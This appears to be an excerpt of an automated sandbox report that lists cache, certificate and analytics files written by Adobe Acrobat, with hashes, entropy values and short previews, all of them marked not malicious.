                                                                                                MD5:A3ED22F9BD451C40D015C33376A68036
                                                                                                SHA1:444AE94B62A9C686E16F7C267EE3DFA5AFB2CECD
                                                                                                SHA-256:A42A536B0C20A70AB54C32E1BDA74578913277A66F201167EE38FD50483BBD56
                                                                                                SHA-512:7B0E4670B894F7295CD1E57AE122BFCC9C7520A3E2C7F10EA0A7298BFB5183BC46DD358EA0F94407B57CD668F2830F06E0D485C28F904D29410F7D941690F318
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2025/01/08-08:48:03.439 1814 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/08-08:48:03.441 1814 Recovering log #3.2025/01/08-08:48:03.441 1814 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):338
                                                                                                Entropy (8bit):5.191234945381666
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOOQvnyq2P92nKuAl9Ombzo2jMGIFUtcQL1ZmwKQdRkwO92nKuAl9Ombzo2jMmLJ:7Xnyv4HAa8uFUtn/BR5LHAa8RJ
                                                                                                MD5:5AA30A94563D2F8D4C4EEE6C702BA41E
                                                                                                SHA1:1CDAB314685E7937796A3E40E05A6372430F3060
                                                                                                SHA-256:A174C6002AB5ACE04B2094CA1434289733A60450474D3F2F003F8064C3C2F569
                                                                                                SHA-512:35D9F8314AB13A079D94A8A0A6B62A350DD55B6D53E304356DB6A109813B4C98841D949196190871D2DE4E3C83B48659ED39DF3462336FEC9DD36A5F9F3CD084
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2025/01/08-08:48:03.524 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/08-08:48:03.526 1c74 Recovering log #3.2025/01/08-08:48:03.526 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):338
                                                                                                Entropy (8bit):5.191234945381666
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOOQvnyq2P92nKuAl9Ombzo2jMGIFUtcQL1ZmwKQdRkwO92nKuAl9Ombzo2jMmLJ:7Xnyv4HAa8uFUtn/BR5LHAa8RJ
                                                                                                MD5:5AA30A94563D2F8D4C4EEE6C702BA41E
                                                                                                SHA1:1CDAB314685E7937796A3E40E05A6372430F3060
                                                                                                SHA-256:A174C6002AB5ACE04B2094CA1434289733A60450474D3F2F003F8064C3C2F569
                                                                                                SHA-512:35D9F8314AB13A079D94A8A0A6B62A350DD55B6D53E304356DB6A109813B4C98841D949196190871D2DE4E3C83B48659ED39DF3462336FEC9DD36A5F9F3CD084
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2025/01/08-08:48:03.524 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/08-08:48:03.526 1c74 Recovering log #3.2025/01/08-08:48:03.526 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:modified
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.0592342205017085
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqV4hsBdOg2HxZcaq3QYiubxnP7E4T3OF+:Y2sRdsBydMH23QYhbxP7nbI+
                                                                                                MD5:A23CEBC1924DCBEEA0B922CC71FEA241
                                                                                                SHA1:F30CCFB6D355C25E7EAB3B3801662A553A4045A6
                                                                                                SHA-256:E4BCF2FF40824A188EE208DA16875C85E862A41400BCBB544EBAB2BF27368C48
                                                                                                SHA-512:7F0ABC04885E4F9D4481EBFEE5319F0A7DCC7045353E2CFA2BA7CDDF1BBF43C899B6F987420DBE5AEFB2C712CFBA818B5740D68C3038C784511E606DE6900E09
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380904095307956","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":134595},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):508
                                                                                                Entropy (8bit):5.0592342205017085
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqV4hsBdOg2HxZcaq3QYiubxnP7E4T3OF+:Y2sRdsBydMH23QYhbxP7nbI+
                                                                                                MD5:A23CEBC1924DCBEEA0B922CC71FEA241
                                                                                                SHA1:F30CCFB6D355C25E7EAB3B3801662A553A4045A6
                                                                                                SHA-256:E4BCF2FF40824A188EE208DA16875C85E862A41400BCBB544EBAB2BF27368C48
                                                                                                SHA-512:7F0ABC04885E4F9D4481EBFEE5319F0A7DCC7045353E2CFA2BA7CDDF1BBF43C899B6F987420DBE5AEFB2C712CFBA818B5740D68C3038C784511E606DE6900E09
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380904095307956","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":134595},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4509
                                                                                                Entropy (8bit):5.2405102266213595
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUd6RKaotAxDUlR4:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLd
                                                                                                MD5:06FB11B7248ABAFCE3EC1CA4B843CD47
                                                                                                SHA1:E4E815C8DADCE30F4B7789E3E3272167E68834DB
                                                                                                SHA-256:ADFDA1459C72400BECCE8F0C2FBEC4198A27CCAC2E4AAADA5EFD54110BA9C3C5
                                                                                                SHA-512:088D554A001154ACD81CA58AEC5839F94BC7006D3B455A79DE1EE9F30F2125E448B1422190BB5B9D6BF2FCFAC1A8913DFCBC496F4007EC2B8D2634F9C97208B7
                                                                                                Malicious:false
                                                                                                Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):326
                                                                                                Entropy (8bit):5.2063270860053334
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOOQCRlyq2P92nKuAl9OmbzNMxIFUtcQ311ZmwKQiRkwO92nKuAl9OmbzNMFLJ:7qnyv4HAa8jFUtR/+R5LHAa84J
                                                                                                MD5:1518057CF8373EF08601AFF75A4E5C4F
                                                                                                SHA1:BCC0FAEBDA40F5CA9C094FC70F9002B37BB8807F
                                                                                                SHA-256:5196CA92314870B317AC1BE7F491D7884B8F640907256DD0A35FBD49CC3EF77F
                                                                                                SHA-512:B6DAAE2C3F5920E4A094727804D7A16686A577C6A04886AE2C14E54F9494C8B63C0D8478B15AABD11199F1877A6992353095123409F2E1564C7562BD1C1133AD
                                                                                                Malicious:false
                                                                                                Preview:2025/01/08-08:48:03.662 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-08:48:03.663 1c74 Recovering log #3.2025/01/08-08:48:03.664 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):326
                                                                                                Entropy (8bit):5.2063270860053334
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOOQCRlyq2P92nKuAl9OmbzNMxIFUtcQ311ZmwKQiRkwO92nKuAl9OmbzNMFLJ:7qnyv4HAa8jFUtR/+R5LHAa84J
                                                                                                MD5:1518057CF8373EF08601AFF75A4E5C4F
                                                                                                SHA1:BCC0FAEBDA40F5CA9C094FC70F9002B37BB8807F
                                                                                                SHA-256:5196CA92314870B317AC1BE7F491D7884B8F640907256DD0A35FBD49CC3EF77F
                                                                                                SHA-512:B6DAAE2C3F5920E4A094727804D7A16686A577C6A04886AE2C14E54F9494C8B63C0D8478B15AABD11199F1877A6992353095123409F2E1564C7562BD1C1133AD
                                                                                                Malicious:false
                                                                                                Preview:2025/01/08-08:48:03.662 1c74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-08:48:03.663 1c74 Recovering log #3.2025/01/08-08:48:03.664 1c74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                Category:dropped
                                                                                                Size (bytes):71190
                                                                                                Entropy (8bit):0.9467154087798311
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:bsJfVSbsIiTfbWiDQT3P3HOEYMFsFGw4Xswrcl:bjbsIiTf2/v7FsFGw418
                                                                                                MD5:8D466DAAF823C6120C099A1F458FCC57
                                                                                                SHA1:C24031394FF7838409EDB3CB3F3C9D7685350E85
                                                                                                SHA-256:951FA05393BE1781468A8C5B5FCB13F9305DB43EF3B0E470E881971B3F1FFFD4
                                                                                                SHA-512:F35673E3A086D111BA162E578DD657C6699EE14F96712B06A0BA377D2528AA7E1608B9194844BEFCF0316DA2F0974203B4955ADFB562B1B6F1AD0BB5471DDD13
                                                                                                Malicious:false
                                                                                                Preview:BM........6...(...u...h..... .................................jji.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Certificate, Version=3
                                                                                                Category:dropped
                                                                                                Size (bytes):1391
                                                                                                Entropy (8bit):7.705940075877404
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                Malicious:false
                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                Category:dropped
                                                                                                Size (bytes):71954
                                                                                                Entropy (8bit):7.996617769952133
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                Malicious:false
                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):192
                                                                                                Entropy (8bit):2.756901573172974
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:kkFklFN7bN/XfllXlE/HT8kFNNX8RolJuRdxLlGB9lQRYwpDdt:kKUmT8gNMa8RdWBwRd
                                                                                                MD5:57B9A93ACA54AE9A1EB3AD6BF395E248
                                                                                                SHA1:33063A60A5DD1A1F86DA9E56737A1B8A6C183720
                                                                                                SHA-256:E08AFB27C9EA831F1CCF095F1932F6ADB04AFB726801E1B7C6D1A5A58469157A
                                                                                                SHA-512:ECFDBCC516085B96683C6E01B493A3257488477929B3E4AA49D55C92DDC700FD50917AACCC278E15EB577FB016EEE420EB4B18B584FBDA1A7F11BE6FD6D1BDB6
                                                                                                Malicious:false
                                                                                                Preview:p...... .........(...a..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):328
                                                                                                Entropy (8bit):3.2401865105070087
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKhPD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1aDImsLNkPlE99SNxAhUe/3
                                                                                                MD5:A85070177F1D68BED98D0AA90440A404
                                                                                                SHA1:58E5BD5C7ABAFD6FF42C9CADA70D835474DE4D1F
                                                                                                SHA-256:E771146A2A331DD76101D024A53FE4A50562C25A3015C668F3BD84ABE762AD29
                                                                                                SHA-512:D4E6F6FA1B35BA5650A7216A83D83EE20868D8FB1F9D682826CABC68B90266D81774384FC18BD8A14A0E467E563F1D1A31634941255A161C2EB0DA7B90FA2B28
                                                                                                Malicious:false
                                                                                                Preview:p...... .............a..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):227002
                                                                                                Entropy (8bit):3.392780893644728
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
                                                                                                MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
                                                                                                SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
                                                                                                SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
                                                                                                SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
                                                                                                Malicious:false
                                                                                                Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.35513584142327
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJM3g98kUwPeUkwRe9:YvXKXcrYpW7ncsGMbLUkee9
                                                                                                MD5:19D158CAAEA9AB92B848AB0C3690F4E7
                                                                                                SHA1:9964C27B463A172E5E3E3564CA8C68609C68BB0B
                                                                                                SHA-256:859B63AF2E3846C34AA52408334FFE0868C9446B2347B98518449E7228C2185B
                                                                                                SHA-512:6860C219B3AAB1CE256B1F22F91B6CFB1B5044A7670529510E5B3049F7DC1524CCF837641D3C05A78B9632FD0FBC5921CAD187C23AF4AF08767C1FF811A7D84F
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.294331705023389
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfBoTfXpnrPeUkwRe9:YvXKXcrYpW7ncsGWTfXcUkee9
                                                                                                MD5:7839FE7268C0BA3CC582E1ACCB52DAD8
                                                                                                SHA1:7F2A4058464C53C086D54F7744A79D9024AF57FD
                                                                                                SHA-256:CFF6D08230D0E8CE94552B67AA86DB81BBE806D56B7D2F8A46486081EF46D0DD
                                                                                                SHA-512:D5B932293222779CA473F14D4E7751877FB4EA4804564E11AF505BF1E1D2A894A474F6159202CB2C58EE7F6A20705271F344E5953AC9538E7E36BCF70C050303
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.272284305022748
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfBD2G6UpnrPeUkwRe9:YvXKXcrYpW7ncsGR22cUkee9
                                                                                                MD5:4B6BB405E15C38207969E0427AE186F6
                                                                                                SHA1:38CC8C3DBABA6204B8382931D446D48E14357D28
                                                                                                SHA-256:CFB6FED810BD955EE2700DFF42916D8E374A6B3F191CE06B6E67C3F0F5D88C2B
                                                                                                SHA-512:AE9866DA2959140E501BB697463908BFF790E0C7544382F62C290BD8DC2D09D64F3FD7A3B0D5E17340B871A96CC273D5100EA2D8BC19653E6BE3546BFA1EDB10
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):285
                                                                                                Entropy (8bit):5.3337400332914555
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJfPmwrPeUkwRe9:YvXKXcrYpW7ncsGH56Ukee9
                                                                                                MD5:B4A026E9BB23203C3BB19E990DD0CFC3
                                                                                                SHA1:B90DB822EAB7936DF327BF41B1EA1DBAD0690C7E
                                                                                                SHA-256:FEC81A3C152E56DE1453C1C32327BDD37069F5470C4FC1BAA422BD1B1483F37C
                                                                                                SHA-512:F0D4FF5840E1964EB17D18D384CEDE5A682E60C88DDCB82098879A08F254BA53637EDE3127F86601F7D8D8E42E77E2CD520A7C89521169C396B8D699242E6626
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1123
                                                                                                Entropy (8bit):5.687280857607566
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XcwincJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSY:Yv/cJhgy6SAFv5Ah8cv/Y
                                                                                                MD5:5AC328B5562A2D81B507E2422F15792E
                                                                                                SHA1:840DAA95F82966BBA16C0EE7A49DD94DC475FAE0
                                                                                                SHA-256:C138D08B5371E9747BFC73F313FF3BAAEBBB6F52854A1694EAA25C2CEC6E11D2
                                                                                                SHA-512:5E0172C1AC238DED91EA8CFB228E5EFD80F8057EF2F698DA960B786AB89A2183C6B753BB6F155ADCF108B0B41BC048509280769140CFC5058783C3D6EFB5E1D3
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.2793152840454445
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXc7yZ+FIbRI6XVW7+0YqcDoAvJf8dPeUkwRe9:YvXKXcrYpW7ncsGU8Ukee9
                                                                                                MD5:5F56484C880146A909DF6EE97FCCA54E
                                                                                                SHA1:A3BDA2E54563B064FEEB63FE0CB994A2EE6571C3
                                                                                                SHA-256:16A812A04D163B01B2DB45D0D62D6CD1D50FE156DE1CDD65B9FEB25D7942AC35
                                                                                                SHA-512:A14B8B3560B33DC9CCAC5D1BB6A90D891388488CB46D70A2F8D8D7D1E6303F4AD089E3ADA73AB4A710C1AE69B40339AFA227E692E7BCE8702566CA062DF3F430
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"d74bc4b7-aa09-4348-ba75-f46cf43d68fb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1736519848501,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
